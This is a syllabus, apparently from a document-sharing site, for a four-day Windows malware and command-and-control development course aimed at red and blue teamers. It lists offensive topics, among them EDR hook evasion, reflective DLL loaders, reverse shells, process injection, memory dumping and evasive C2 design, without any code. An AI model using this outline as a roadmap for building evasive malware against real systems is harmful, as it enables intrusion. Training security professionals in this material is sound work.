Professional Documents
Culture Documents
Syllabus - Malware Development
Syllabus - Malware Development
STEROIDS
Malware and C2 Development
Training Program for Windows
1
Table Of Contents
Day 1
• Course Overview
• Development VM Setup
◦ Mingw GCC
◦ Netwide Assembler for x64 Assembly (NASM)
◦ Makefiles and Automation
• Command and Control Architecture
◦ Malware Lifecycle
◦ Payload Handler
◦ Staging Architecture
• Windows Internals
◦ Windows OS architecture
◦ Process & Thread Internals
◦ Debugging with Windbg
▪ Thread Environment Block
▪ Process Environment Block
▪ Windows Loader Structure
▪ Introduction and Crash Course to WinDbg
• Windows Memory Protections
• Windows System Programming
• Debugging with x64Dbg
◦ Introduction to x64Dbg
◦ Introduction to x64 Intel Assembly
◦ Understanding x64 Registers and Stack
2
◦ Function calls in x86 vs x64 Assembly
◦ Hooking and Reversing WinAPIs/NTAPI with
x64dbg
◦ Trampoline v/s IAT Hooks
◦ Reversing EDR Trampoline Hooks
◦ Weaponizing Reversed Hooks
◦ Rewriting EDR Hooks
Day 2
• PE & DLL Structure
◦ Building Static and Dynamic DLLs
◦ COFF header
▪ Analyzing PE Structures
• Explorer Suite/CFF Explorer
• Process Hacker
◦ Stephen Fewer’s Reflective DLL Limitations
◦ Building a Custom Reflective DLL Loader
◦ String Hashing Algorithms
◦ Building a Custom Injector for Reflective
DLL
◦ Modifying Reflective DLL’s PE Sections in
Memory
◦ Allocations to avoid EDR Detections
◦ Hiding Memory Allocations with DLL/PE Image
Spoofing
◦ Hiding Thread Creation with Instruction
Pointer Spoofing
3
◦ Using NTAPIs for Reflection Reallocations
◦ Using Syscalls for Reflection Reallocations
Day 3
• Windows Socket Programming
◦ Reverse Shells in C
◦ Bind Shells in C
• Buffer Redirection with Anonymous Pipes
• Named Pipe Lateral Movement
• Windows Access Tokens
• SpyC2 – Building your own CnC in python3, C
and x64 Shellcode
• C2 Weaponization
◦ Building A Persistent Synchronous TCP C2
◦ Building an Asynchronous C2 with HTTP
Callbacks
◦ Building Proxy-Aware Payloads
◦ Evading Network Detection & Response Tools
for your CnC
◦ C2 Authentication
◦ Comm Encryption
◦ Sleep & Jitter
◦ C2 Round Robins
◦ URI Handling
◦ Payload Logging
◦ CnC Server OpSec Considerations
4
• Writing Function Pointer Arrays for Dynamic
Command Execution in your C2 Payload
◦ Malware Functions
◦ Enumerating and Searching Process
◦ Orthodox Memory Dumping Techniques
▪ MiniDumpWriteDump
▪ PssCreateSnapshot
◦ User Privilege Enumeration
◦ Host Enumeration
◦ Building Pluggable Modules for your Command
& Control Server
• Building Reflective Staged Payloads
• Building Reflection Features Inside your
Payloads to Load Existing Reflective DLLs as
modules.
Day 4
• Basic Process Injections
◦ Shellcode Injection
◦ Remote Threads
◦ In-Memory File and Section mapping
◦ Asynchronous Procedure Calls
◦ PE/DLL Stomping
• X64 Position Independent Shellcoding
◦ Walking PEB and hunting kernel32.dll,
ntdll.dll, kernelbase.dll
◦ Position Independent Code in C
5
◦ Shellcode Stack alignment
◦ Writing a custom GetProcAddress in C
◦ Finding Syscalls Dynamically (on-the-fly)
◦ Extracting Shellcode from PIC
◦ Passing arguments to your shellcode
◦ In-Memory Object File Execution
◦ Thread Stack Spoofing
◦ Thread Start Address Spoofing
◦ Writing Stage Zero x64 Shellcode
◦ Writing Stage Server in Python3
• Process Heap Encryption
• Shellcode Encryption with RC4
• OpSec Considerations
6
Target Audience
• Red Team members
• Penetration Testers
• Blue Teamers
• Threat Hunters
Requirements
• A laptop with 16GB RAM to support 2 VMs running at the same
time.
• Basic Understanding of operating system architecture
• Basic understanding of programming concepts
• Experience with or knowledge of pointers, addresses in C and
multi-threading/processing in Python3
• Strong will to learn and creative mindset.